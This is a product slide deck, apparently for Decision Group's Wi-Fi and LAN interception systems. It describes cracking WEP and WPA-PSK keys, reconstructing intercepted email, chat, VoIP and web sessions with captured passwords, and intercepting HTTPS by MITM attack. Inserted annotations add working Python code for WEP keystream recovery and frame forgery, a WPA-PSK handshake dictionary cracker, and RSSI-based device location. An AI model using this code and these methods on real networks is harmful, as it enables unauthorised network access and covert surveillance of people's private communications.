Screenshot: STA list with columns STA, SCAN, MANUAL, CLIENT MAC, STR., PACKETS, BSSID, KEY, CH., ESSID, Blocking; 9 stations are listed (Count: 9, Total: 1, In page 1, Rows per page: 20). The MAC columns are not legible in the capture. Readable rows include a client on the "linksys" AP (WPA, channel 6, 43 packets, signal 45), a client on a WEP AP on channel 11, and several clients whose BSSID is shown as the broadcast address FF:FF:FF:FF:FF:FF with channel -1, i.e. stations that are probing but not associated with any AP. 

Obtainable information: client MAC address, signal strength, packets, AP MAC address, key (encrypted or unencrypted), SSID. 


Cracking/Decryption of WEP/WPA Key (1) 

WEP key cracking/decryption can be done by the Wireless-Detective system! 

Auto cracking (system default) or manual cracking 

1) WEP key cracking/decryption (64-, 128- and 256-bit keys) 
Active crack: by utilizing ARP packet injection (possibly 5-20 minutes) 
Passive crack: silently collect wireless LAN packets 

64-bit key: 10 hex digits (100-300 MB raw data / 100K-300K IVs collected) 
128-bit key: 26 hex digits (150-500 MB raw data / 150K-500K IVs collected) 

2) WPA-PSK key cracking/decryption (optional module available) 
WPA-PSK cracking is an optional module. Using an external server with a smart password list and GPU acceleration technology, the WPA-PSK key can be recovered/cracked. 

Notes: 

The time taken to recover the WEP key in passive mode depends on the amount of network activity, because the attack needs a large number of frames with distinct IVs; active mode uses ARP injection to make the AP generate new IVs much faster. 
The time to crack a WPA-PSK key depends on the length and complexity of the passphrase. In addition, it is compulsory to have the WPA-PSK 4-way handshake packets captured: the passphrase itself is never transmitted, and the handshake is the only material a candidate passphrase can be checked against. 
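
To make concrete why the slide counts IVs rather than minutes, and why ARP injection speeds things up, here is an added example (not Wireless-Detective's code, and not from the page) of the WEP mechanics behind both modes. It implements WEP's RC4-over-IV||key encryption with the CRC-32 ICV, then shows the attacker side, which needs no key: an ARP request has a fully predictable plaintext (LLC/SNAP header plus 28 ARP bytes), so XORing it with the captured ciphertext yields the keystream for that 24-bit IV; with that keystream the attacker can decrypt any other frame that reuses the IV and, because the ICV is a keyless CRC, forge new frames the AP accepts (the replay/injection step that makes the AP emit fresh IVs). The statistical key recovery itself (FMS/KoreK/PTW over the collected IVs) is not implemented here. The key, IV, MAC and IP addresses and frames are all constructed; the 10-hex-digit key only echoes the 64-bit format named on the slide.

```python
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream; WEP seeds it with IV || secret key (24 + 40/104/232 bits)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _icv(data: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)   # WEP ICV is an unkeyed CRC-32


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP data body: 3-byte IV sent in the clear, then RC4(payload || ICV)."""
    if len(iv) != 3 or len(key) not in (5, 13, 29):            # 64/128/256-bit WEP
        raise ValueError("bad IV or key length")
    ks = rc4(iv + key, len(payload) + 4)
    return iv + bytes(a ^ b for a, b in zip(payload + _icv(payload), ks))


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    """What the AP (which holds the key) does on receipt, including the ICV check."""
    iv, ct = body[:3], body[3:]
    pt = bytes(a ^ b for a, b in zip(ct, rc4(iv + key, len(ct))))
    data, icv = pt[:-4], pt[-4:]
    if icv != _icv(data):
        raise ValueError("ICV check failed")
    return data


# --- attacker side: the secret key is never used below -----------------------
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"   # first 8 bytes of every ARP frame


def recover_keystream(body: bytes, known_plaintext: bytes) -> bytes:
    """Keystream for this IV = ciphertext XOR known plaintext."""
    ct = body[3 : 3 + len(known_plaintext)]
    return bytes(a ^ b for a, b in zip(ct, known_plaintext))


def decrypt_with_keystream(body: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that reuses the same IV, as far as the keystream reaches."""
    ct = body[3 : 3 + len(keystream)]
    return bytes(a ^ b for a, b in zip(ct, keystream))


def forge(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Build a frame the AP will accept by reusing a known IV/keystream pair.
    The ICV is CRC-32 over the chosen plaintext, so it needs no key either."""
    pt = payload + _icv(payload)
    if len(pt) > len(keystream):
        raise ValueError("need %d keystream bytes, have %d" % (len(pt), len(keystream)))
    return iv + bytes(a ^ b for a, b in zip(pt, keystream))


# Constructed demo values (not from the page): a 64-bit key and one ARP request.
KEY = bytes.fromhex("1A2B3C4D5E")                  # 10 hex digits = 40-bit secret part
IV = b"\x00\x00\x01"
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex(
    "0001080006040001"      # hw type, proto type, hlen, plen, opcode = request
    "020000000011" "c0a80164"   # sender MAC / IP (192.168.1.100)
    "000000000000" "c0a80101")  # target MAC / IP (192.168.1.1): who-has 192.168.1.1


def demo() -> bytes:
    captured = wep_encrypt(KEY, IV, ARP_REQUEST)                  # seen on the air
    # The whole ARP request is predictable, and so is its CRC: 40 keystream bytes.
    ks = recover_keystream(captured, ARP_REQUEST + _icv(ARP_REQUEST))
    new_arp = ARP_REQUEST[:-4] + bytes.fromhex("c0a80102")        # who-has 192.168.1.2
    forged = forge(IV, ks, new_arp)                               # injected without the key
    return wep_decrypt(KEY, forged)                               # the AP accepts it


if __name__ == "__main__":
    print(demo().hex())
```

Two properties do the damage: the IV is only 24 bits, so keystream reuse is unavoidable on a busy network, and the ICV is linear, so forged frames cost nothing. Injecting a captured ARP request back at the AP exploits both; every reply comes back under a new IV, which is exactly the material the statistical key-recovery step consumes.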


Cracking/Decryption of WEP Key (2) 

Automatic: the system cracks/decrypts the WEP key by itself (default) 
Manual: capture raw data and crack/decrypt the WEP key manually 

Screenshot: the Capture tab in AP mode (Hard Disk Information: 146G / Used 3.3G / Available 136G / 97%; Refresh: 7 s; capture By Channel + AP / Manual). The AP list holds 15 access points on channels 1-7 (Count: 15, Total: 2, In page 1, Rows per page: 10), mostly WEP with two WPA, ESSIDs truncated (2WIRE..., etc.), and a WEP key field for AP 2 (00:23:51:..., channel 6, 54 Mb/s, ESSID 2WIRE...) reading 1234567890, a 10-hex-digit 64-bit key. The left-hand menu lists the reconstructed categories with their record counts: IMAP (14), WEBMAIL (READ), WEBMAIL (SENT), MSN (18), ICQ (7), QQ (10), UT (1), SKYPE (3), GOOGLETALK (1), FTP (22), P2P (13), GAME (3), HTTP (CONTENT), HTTP (DOWNLOAD), HTTP (RECONSTRUCT), VIDEO STREAM (35), TELNET (44), plus SEARCH and ALERT. 


Wireless-Detective - WPA-PSK Cracking Sol. 

Diagram: the distributed deployment (three Wireless-Detective slaves around the target AP and its wireless STAs, reporting to a Wireless-Detective master for central management) hands the raw data packets containing the handshake packets to a single server or to distributed servers that run the smart password list attack simultaneously. 

WPA-PSK Cracking Solution 
* WPA handshake packets need to be captured in order to crack the WPA key. 
* Utilize a single server or distributed servers (multiple servers running the smart password list attack simultaneously) to crack the WPA key. 
* Implementation of single or distributed servers; acceleration technology: GPU acceleration. 

Distributed password list/dictionary cracking using GPU acceleration for WPA-PSK or WPA2-PSK key cracking. 

Note: WPA handshake packets can be captured by a standalone Wireless-Detective system or by distributed Wireless-Detective systems. 
This is an optional feature! Additional system is required! Please contact Decision Group for more information. 
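
The reason the notes insist on a captured handshake is that the passphrase is never sent over the air; only a MIC keyed from it is. The following added example (not the page's or Decision Group's code, and not Elcomsoft's; it runs the same derivation that any WPA-PSK cracker, GPU or CPU, has to run) derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), takes the KCK from the 802.11i PTK PRF, recomputes the HMAC-SHA1 MIC over EAPOL-Key message 2 for each candidate passphrase and reports the one that matches. The handshake is constructed in the block (SSID wd-lab, locally administered MACs, fixed nonces, a minimal message 2); a real run would pull ap_mac, sta_mac, ANonce, SNonce and message 2 out of the captured EAPOL frames.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

# Byte offset of the Key MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFF = 81


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes      # authenticator (BSSID)
    sta_mac: bytes     # supplicant
    anonce: bytes      # nonce from message 1 (AP -> STA)
    snonce: bytes      # nonce from message 2 (STA -> AP)
    eapol2: bytes      # full EAPOL-Key message 2, MIC field included


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The 4096 rounds are the per-candidate cost that GPU acceleration parallelizes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 over the PMK; the first 16 bytes of the PTK are the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = eapol[:MIC_OFF] + bytes(16) + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the passphrase whose derived KCK reproduces the captured MIC."""
    captured_mic = hs.eapol2[MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = kck_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol2), captured_mic):
            return candidate
    return None


# --- constructed handshake (not a capture from the page) ----------------------
def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (WPA2, pairwise, MIC bit set, no key data)."""
    body = (bytes([2])                          # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")       # key info: version 2 (HMAC-SHA1), pairwise, MIC
            + (16).to_bytes(2, "big")           # key length (CCMP)
            + (1).to_bytes(8, "big")            # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + mic + (0).to_bytes(2, "big"))     # MIC, key data length
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = Key


def make_capture(passphrase: str, ssid: str = "wd-lab") -> Handshake:
    ap_mac, sta_mac = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    signed = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, signed)


WORDLIST = ["password", "0660", "letmein", "wd-lab-2010", "12345678"]

if __name__ == "__main__":
    hs = make_capture("wd-lab-2010")
    print("recovered:", crack(hs, WORDLIST))
```

Two things follow from the derivation. The PMK is salted with the SSID, so a password list has to be re-hashed per network (which is why rainbow tables only exist for the most common SSIDs), and every candidate costs the full 4096-round PBKDF2 plus four HMACs; on one CPU core that is a few milliseconds per candidate, i.e. a few hundred passphrases per second, and GPUs change that rate, not the work per candidate. A handshake with a wrong or missing message 2 cannot be checked at all, hence "compulsory".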


Wireless-Detective - WPA-PSK Cracking Sol. (3) 

Screenshot: Elcomsoft Wireless Security Auditor (menu File | Action | Options | Help; toolbar Import data, Create project, Open project, Save project, Start attack, Pause attack, Check for updates, Help contents) running a dictionary attack: 

Dictionaries total: 1          Dictionaries left: 0 
Time elapsed: 0y 0d 0h:0m:4s   Time left: 0y 1d 1h:5m:25s 
Current speed: 507             Average speed: 419 
Last password: 0660            Processor load: 100% 
english.dic - 0% 

Log: 
10:22:35 March 07, 2010   english.dic has been opened successfully 
10:22:35 March 07, 2010   About to start new recovery: 2 CPU core(s), 0 GPU card(s) 
10:22:36 March 07, 2010   Recovery: started 

This particular run is CPU-only (2 cores, 0 GPU cards) at roughly 400-500 passphrases per second, which is why one dictionary is estimated at more than a day; the GPU acceleration described on the preceding slides is what brings such runs down to practical times. 

This is an optional feature! An additional system is required! 
Please contact Decision Group for more information. 


Reconstruction - Sample Email - POP3 

Screenshot (Internet Explorer, https://192.168.10.60/main.php): the left-hand menu lists POP3 (66) broken down by client IP (192.168.1.9 (9), 192.168.1.10 (11), 192.168.1.11 (30), 192.168.1.33 (14), 192.168.1.142), then IMAP (14), WEBMAIL (READ), WEBMAIL (SENT) and the chat categories. The POP3 list for 192.168.1.11 (columns NO., DATE/TIME, ACCOUNT, PASSWORD, FROM, SUBJECT; Count: 30, Total: 2, In page 2, Rows per page: 20) is mostly spam addressed to support@ed-system.sg (subjects such as "Staff Placement", "Only the Beginning", "UN finds world economic insecurity ..."). The PASSWORD column is there because a plain POP3 login carries the mailbox password in the clear. One message is opened in a second window (https://192.168.10.60/appsrv/eml/1/index.html): 

Subject: Brazil's new drunken driving law stirs discontent 
From: fransyinmy@yahoo.com 
To: support@ed-system.sg 
CC / BCC: none 
Date: 2008-07-02 10:24:04 
Body: a wire-service article (BRASILIA) on Brazil's drink-driving law that took effect on June 20: a new limit of 0.2 decigrammes of alcohol per litre of blood (previously 0.6), a fine of at least US$600 (S$818) and a one-year licence suspension, with some 300 motorists arrested by federal police in the first 10 days. 


Reconstruction - Sample Email - SMTP 

Screenshot (Internet Explorer, https://192.168.10.60/main.php): CATEGORY: SMTP - 192.168.1.11. The menu shows POP3 (66), SMTP (19) split by client IP (192.168.1.10 (5), 192.168.1.11 ...), IMAP (14), WEBMAIL (READ), WEBMAIL (SENT), MSN, ICQ, YAHOO, QQ, UT, SKYPE, GOOGLETALK, IRC, FTP, P2P, GAME and the HTTP categories. The SMTP list (columns NO., DATE/TIME, FROM, TO, CC, BCC, SUBJECT, SIZE; Count: 3, Total: 1, In page 1, Rows per page: 20) holds three messages from decision@ed-system.sg to decision@ed-system.sg / support@ed-system.sg, subjects "MY Email", "New York" and "Captured", sizes 93.5K, 77.9K and 97.3K. The third is opened in a second window (https://192.168.10.60/appsrv/eml/4/index.html): 

From: decision@ed-system.sg 
To: support@ed-system.sg 
Subject: Ex-con suspected of killing 8 captured 
Body: a wire-service article (GRANITE CITY, Illinois) on the arrest of an ex-convict the FBI had linked to the killings of eight people in Illinois and Missouri, including a 65-year-old man found behind a Galesburg grocery store. 


Reconstruction - Sample Email - IMAP 

Screenshot (https://192.168.10.60/main.php): CATEGORY: IMAP - 192.168.1.10, with the menu showing POP3 (66), IMAP (14), WEBMAIL (READ), WEBMAIL (SENT), MSN (18) and the other categories. The list (columns NO., DATE/TIME, FROM, ACCOUNT, PASSWORD, SUBJECT; Count: 30, Total: 2, In page 2, Rows per page: 20) shows the same mailbox contents as the POP3 slide (spam to support@ed-system.sg, dated 2008-07-02), and the message opened in the second window (https://192.168.10.60/appsrv/eml/1/index.html) is again "Brazil's new drunken driving law stirs discontent", dated 2008-07-02 10:24:04. 


Reconstruction — Sample Web Mail (Read)

[Screenshot: E-Detective web GUI (https://192.168.1.60/main.php) with its category tree (POP3, SMTP, IMAP, WEBMAIL (READ), WEBMAIL (SENT), MSN, ICQ, YAHOO, QQ, SKYPE, HTTP (LINK/CONTENT/DOWNLOAD/RECONSTRUCT), TELNET, SEARCH, ALERT, EXPORT, MANAGE) and a reconstructed WEBMAIL (READ) record for IP 192.168.1.103 at 2008-03-02 13:47:08, showing the FROM, DATE / TIME, TO, CC and SUBJECT fields and the rendered message body; the record list also identifies the webmail type (GMail, YAHOO Mail, YAHOO2.0 Mail, Windows Live).]

Reconstruction — Sample Web Mail (Sent)

[Screenshot: E-Detective GUI (https://192.168.10.60/main.php), CATEGORY: WEBMAIL (SENT), listing records with the columns DATE / TIME, FROM, TO, CC, BCC, SUBJECT and Webmail Type (GMail entries from 2008-07-02) and, in a detail window, a reconstructed sent message with its FROM, DATE / TIME, TO, SUBJECT and ATTACHMENT (1. SIA.jpg) fields and the rendered body of a UN news article.]

Reconstruction — Sample IM/Chat — MSN

[Screenshot: CATEGORY: MSN - 192.168.1.11, conversation list (DATE / TIME, PARTICIPANTS, CONVERSATION, COUNTS) and a conversation detail window (NO., DATE / TIME, SCREEN NAME, FILE NAME, SIZE, MESSAGE) showing a 10-message chat between two hotmail.com accounts on 2008-06-02, including one 439.8K file transfer.]

Including Text Chat Messages, File Transfer and Webcam sessions reconstruction and playback.
Supports Client and Web MSN.

Reconstruction — Sample IM/Chat — Yahoo

[Screenshot: CATEGORY: YAHOO - 192.168.1.17, conversation list (NO., DATE / TIME, SCREEN NAME, PARTICIPANTS, CONVERSATION, COUNTS) and a detail window (NO., DATE / TIME, SCREEN NAME, TYPE, MESSAGE, START TIME, END TIME) for a 2006-10-21 conversation with 8 entries.]

Including Text Chat Messages, File Transfer, VOIP and Webcam sessions reconstruction and playback.
Supports Client and Web Yahoo.

Reconstruction — Sample File Transfer - FTP

[Screenshot: CATEGORY: FTP, record list (NO., DATE / TIME, ACCOUNT, PASSWORD, ACTION, FTP SERVER, FILE NAME) with four anonymous DownLoad entries of D-Link product datasheet PDFs on 2008-07-02; clicking a file name opens the Internet Explorer File Download dialog ("Do you want to open or save this file?") and the reconstructed PDF datasheet served from 192.168.10.60.]

Reconstruction — Sample Peer to Peer — P2P

[Screenshot: CATEGORY: P2P - 192.168.1.10, record list (No., DATE/TIME, TOOL, FILE NAME, Last Activated, Send Throughput, Receive Throughput, Detail) with Foxy 1.9.8.0 and LimeWire/4.16.6 transfers, and a Detail window listing every peer connection of one transfer (No., DATE/TIME, ACTION, PEER IP, PORT, PEER PORT, Throughput).]

Including Action (Download/Upload), Peer IP, Port, Peer Port & Throughput

Reconstruction — Sample HTTP — Reconstruct

[Screenshot: CATEGORY: HTTP (RECONSTRUCT) for IP 192.168.1.11, list of captured page URLs (No., Date-Time, HTTP Content) from 2008-07-02 02:34 to 02:44 (msn.com, yahoo.com, digg.com, isohunt.com, dlink.com pages) and the reconstructed isohunt.com front page of 2008-07-02 02:37:42 rendered in Internet Explorer through http_reconstruct.php.]

Reconstruction — Sample HTTP — Upload/Download

[Screenshot: HTTP (DOWNLOAD) category list (No., Date-Time, Action, File Name, HTTP Content, File Size) with Download and Upload records from 2008-03-02 (e.g. mirc631.exe, links.txt, receiveim.mp3, a demo 3.JPG uploaded to Gmail, downloaded PDFs), a Hard Disk Information line (146G total, 3.0G used, 136G available) and a downloaded newspaper PDF opened from the system.]

Reconstruction — Sample HTTP — Video Streaming

[Screenshot: CATEGORY: VIDEO STREAM - 192.168.1.33, list (No., Date-Time, HOST, File Name, HTTP Content, File Size) of 22 records from 2008-09-22 in which each youtube.com watch URL is paired with the entry for the video host that served the file, and a player window (https://192.168.10.60/http/player.swf) playing a reconstructed clip.]

Play back reconstructed FLV video file

Reconstruction — VoIP SIP/H.323 RTP Voice Calls

[Screenshot: CATEGORY: VOIP (6 records dated 2009-12-13 12:01:55) with the columns NO., Date-Time, Caller, Callee, Mode (peer to peer), Type (SIP), Codec (G723, iLBC, G729), File Name (VOIP_*.wav) and Time (call durations from 8 Sec to 1 Min 3 Sec); Windows Media Player is shown playing one of the reconstructed calls.]

Reconstruction — Sample Incomplete Sessions

[Screenshot: CATEGORY: INCOMPLETE - 192.168.0.100, list (No., Date/Time, BSSID, Source, Destination, File, Size, Type, Comment) of 2007-10-13 HTTP sessions saved as INCOMPLETE_*.dat with the comment "Lost HTTP Header"; one .dat file is downloaded through the Internet Explorer File Download dialog and opened in WordPad, where it contains the raw HTTP GET request headers (Accept, Referer, Accept-Language, UA-CPU, Accept-Encoding, If-Modified-Since, If-None-Match, User-Agent, Host, Connection) of image requests to www.ed-system.sg.]

Data Search — Conditions & Free Text Search

[Screenshot: search_list.php page with the Search Conditions panel (History and Search tabs, APPLY button) and the condition fields MODULE, DATE, TIME, IP (ALL), BSSID, MAC, EMAIL (FROM / TO / CC / BCC), SUBJECT, WEBMAIL TYPE, SERVER IP, ACCOUNT, P2P TOOL, P2P FILE, GAME NAME and MSN ACCOUNT (SCREEN NAME / PARTICIPANTS).]


Location Estimation - Wireless Equipment Locator 


Utilizes wireless sensors and a triangulation calculation/training methodology (plane regression) to estimate
the location of the targeted wireless devices (AP or STA).
Requires 1 WD as the Master system plus a minimum of 3 WD as Slave systems (sensors).


[Screenshot: Wireless Equipment Locator window (File / Edit / Run menu; toolbar: New, Train, Rescan, Log) showing the Wireless Network Topology list of detected device MAC addresses beside a floor-plan grid; callouts: "Select the targeted wireless device to show the estimated location", "Display of targeted device estimated location"; status line "Training process completed".]


Allows finding the approximate location of the targeted wireless device in the X-Y plane.
The estimation error depends on the surrounding environment (e.g. blockage); it is normally a few meters.
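As an added illustration (not Decision Group's code; the slides do not disclose the product's algorithm), the following Python sketch shows the two steps named above from a defender's side, for instance when locating a rogue AP with a WIDS: a training pass that fits a path-loss model from readings at known distances, and a least-squares triangulation over three or more fixed sensors that returns an X-Y estimate. The sensor positions, RSSI values, noise figures and the log-distance model are all constructed assumptions.

```python
"""Added illustration, not Decision Group's code: estimate a wireless
device's X-Y position from the RSSI reported by fixed sensors.

Assumptions (constructed, not from the slides): each sensor reports RSSI in
dBm; distance follows the log-distance model rssi = rssi_1m - 10*n*log10(d),
whose parameters are fitted in a "training" pass from readings at known
distances; the position is the least-squares solution of the linearised
circle equations over three or more non-collinear sensors.
"""
import math
from typing import Dict, Sequence, Tuple

Point = Tuple[float, float]


def train_path_loss(samples: Sequence[Tuple[float, float]]) -> Tuple[float, float]:
    """Fit rssi = a - 10*n*log10(d) by ordinary least squares.

    samples: (distance_m, rssi_dbm) pairs from a training emitter placed at
    known distances.  Returns (rssi_1m, path_loss_exponent)."""
    xs = [-10.0 * math.log10(d) for d, _ in samples]
    ys = [r for _, r in samples]
    mean_x, mean_y = sum(xs) / len(xs), sum(ys) / len(ys)
    sxx = sum((x - mean_x) ** 2 for x in xs)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    n = sxy / sxx              # slope of rssi against -10*log10(d)
    a = mean_y - n * mean_x    # rssi at 1 m
    return a, n


def rssi_to_distance(rssi: float, rssi_1m: float, n: float) -> float:
    """Invert the path-loss model to a distance in metres."""
    return 10.0 ** ((rssi_1m - rssi) / (10.0 * n))


def trilaterate(sensors: Dict[str, Point], distances: Dict[str, float]) -> Point:
    """Least-squares X-Y position from three or more sensors.

    Subtracting the first sensor's circle (x-x0)^2+(y-y0)^2=d0^2 from each other
    sensor's circle cancels the quadratic terms and leaves one linear row
    2(xi-x0)x + 2(yi-y0)y = d0^2 - di^2 + xi^2 - x0^2 + yi^2 - y0^2."""
    names = list(sensors)
    if len(names) < 3:
        raise ValueError("need at least three sensors")
    x0, y0 = sensors[names[0]]
    d0 = distances[names[0]]
    rows, rhs = [], []
    for name in names[1:]:
        xi, yi = sensors[name]
        di = distances[name]
        rows.append((2.0 * (xi - x0), 2.0 * (yi - y0)))
        rhs.append(d0 ** 2 - di ** 2 + xi ** 2 - x0 ** 2 + yi ** 2 - y0 ** 2)
    # Solve the 2x2 normal equations (A^T A) p = A^T b.
    m00 = sum(r[0] * r[0] for r in rows)
    m01 = sum(r[0] * r[1] for r in rows)
    m11 = sum(r[1] * r[1] for r in rows)
    v0 = sum(r[0] * b for r, b in zip(rows, rhs))
    v1 = sum(r[1] * b for r, b in zip(rows, rhs))
    det = m00 * m11 - m01 * m01
    if abs(det) < 1e-9:
        raise ValueError("sensors are collinear; position is ambiguous")
    return (m11 * v0 - m01 * v1) / det, (m00 * v1 - m01 * v0) / det


def locate(sensors: Dict[str, Point], readings: Dict[str, float],
           rssi_1m: float, n: float) -> Point:
    """Convert each sensor's RSSI to a distance, then triangulate."""
    distances = {k: rssi_to_distance(v, rssi_1m, n) for k, v in readings.items()}
    return trilaterate(sensors, distances)


def model_rssi(distance_m: float, rssi_1m: float, n: float) -> float:
    """Forward model; used here only to fabricate sample readings."""
    return rssi_1m - 10.0 * n * math.log10(distance_m)


# Constructed demo: four sensors on the corners of a 10 m square, the targeted
# device actually at (3, 4) m, rssi_1m = -40 dBm and path-loss exponent 2.5.
SENSORS: Dict[str, Point] = {"s1": (0.0, 0.0), "s2": (10.0, 0.0),
                             "s3": (0.0, 10.0), "s4": (10.0, 10.0)}
TRUE_POS: Point = (3.0, 4.0)
TRUE_A, TRUE_N = -40.0, 2.5
# Constructed per-sensor measurement error in dB (multipath, blockage).
NOISE_DB = {"s1": 1.5, "s2": -2.0, "s3": 0.5, "s4": -1.0}


def demo(noisy: bool = True) -> Tuple[Point, float]:
    """Train on known-distance samples, locate the target, return the error."""
    training = [(d, model_rssi(d, TRUE_A, TRUE_N)) for d in (1.0, 2.0, 4.0, 8.0, 16.0)]
    a, n = train_path_loss(training)
    readings = {}
    for name, pos in SENSORS.items():
        rssi = model_rssi(math.dist(pos, TRUE_POS), TRUE_A, TRUE_N)
        readings[name] = rssi + (NOISE_DB[name] if noisy else 0.0)
    est = locate(SENSORS, readings, a, n)
    return est, math.dist(est, TRUE_POS)


if __name__ == "__main__":
    for noisy in (False, True):
        est, err = demo(noisy)
        print(f"noisy={noisy}: estimate=({est[0]:.2f}, {est[1]:.2f}) m, error={err:.2f} m")
```

With the constructed noise the estimate lands about 1.5 m from the true position, which is the "normally a few meters" error the slide quotes; without noise it recovers (3, 4) exactly.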


Integrated Wireline & Wi-Fi/WLAN 
Real-Time Interception & 
Reconstruction System 
Network Investigation Toolkit (NIT) 


Only for Government & LEA users!


What are the capabilities of NIT?


Intercepts Ethernet LAN traffic through a mirror/SPAN port (or by using a network tap).
Intercepts WLAN traffic (up to 4 different WLAN channels).
Intercepts Ethernet LAN based HTTPS/SSL traffic by MITM attack.
Intercepts WLAN based HTTPS/SSL traffic by MITM attack.
Real-time raw data decoding and reconstruction.
Offline raw data manual decoding and reconstruction.
Forensic analysis and evidence preservation for investigation.


Introduction to Network Investigation Toolkit 


[Diagram: NIT hardware: a Lenovo ThinkPad X200 with a USB hub, a USB 3.5G/HSDPA adapter and USB Wi-Fi adapters.]


Solution for:

Law Enforcement Agencies (Police Intelligence, Military Intelligence, National Security, Counter Terrorism, Cyber Security, Defense Ministry, Secret Services etc.)


NIT Implementation Mode - LAN Interception 


[Diagram: Ethernet LAN passive interception. Mode of Operation: Ethernet LAN Passive Interception (Passive Mode). The NIT System, managed by the investigator, is attached to a mirror port of the switch that sits between the Router/Firewall (INTERNET side) and the servers / SERVER FARM, with further switches serving another building/department/floor.]

Capture - Sniffer Mode
Sniffer technology is used for capturing Internet traffic/packets through a port-mirroring switch.


NIT Implementation Mode — LAN HTTPS Interception 


[Diagram: LAN HTTPS/SSL MITM interception (Active Mode). The Network Investigation Toolkit (NIT), managed by an administrator, is connected between the Router/Firewall (INTERNET side, external SSL SERVERS) and the SWITCH/HUB serving the SERVER FARM and the Targeted Users Pool. MITM Attack By: 1. Connect to LAN Internet; 2. Connect to WLAN Internet; 3. Connect to 3G Internet.]


NIT Implementation Mode — WLAN Interception 


[Diagram: WLAN passive interception (Passive Mode). Mode of Operation: WLAN Passive Interception. The NIT System (WLAN Interception) monitors an AP on CH6 (connected to the INTERNET) and its Wireless STAs. Cracking of: WEP Key; WPA-PSK Key (Optional).]

Intercept up to 4 concurrent channels


NIT Implementation Mode — WLAN HTTPS Interception 


[Diagram: WLAN HTTPS/SSL MITM interception (Active Mode). The NIT (WLAN HTTPS/SSL MITM Interception) system acts as an AP for the targeted user's Wireless STA and reaches the INTERNET by: 1. Connect back to AP; 2. Connect to LAN Internet; 3. Connect to 3.5G Internet.]


Cracking/Decryption of WEP/WPA Key 


WEP Key Cracking/Decryption can be done by the NIT System!

1. WEP Key Cracking/Decryption: (64, 128, 256 bit key)
Active Crack — by utilizing ARP packet injection (possibly about 5-10 mins.)
64-bit key — 10 HEX
128-bit key — 26 HEX

2. WPA-PSK Key Cracking/Decryption: (Optional Module Available)
WPA-PSK cracking is an optional module, using an external server with
Smart Password List and GPU Acceleration Technology.

This helps and increases the chance of WPA-PSK cracking for LEA.
Countermeasure: Intercept at the ISP or Human Intelligence

Notes:
The time taken to decrypt the WEP key in passive mode depends on the amount of network activity.
The time to crack a WPA-PSK key depends on the length and complexity of the key. Besides, it is
compulsory to have the WPA-PSK handshake packets captured for a chance to crack the key.


WPA-PSK Password Recovery 


[Screenshot: Elcomsoft Wireless Security Auditor (File / Action / Options / Help; toolbar: Import data, Create project, Open project, Save project, Start attack, Pause attack, Check for updates, Help contents) reporting "Congratulations! The password has been found." with its log: 10:27:18 April 09, 2011 About to start new recovery: 2 CPU cores, 0 h/w accelerators; Starting performance monitor; 10:27:19 Performance monitor started successfully; Recovery: started; Recovery: the password has been found :); 10:27:20 Recovery: stopped.]

This is an optional feature! An additional system is required!
Please contact Decision Group for more information.


NIT — Homepage - Status of Operation 


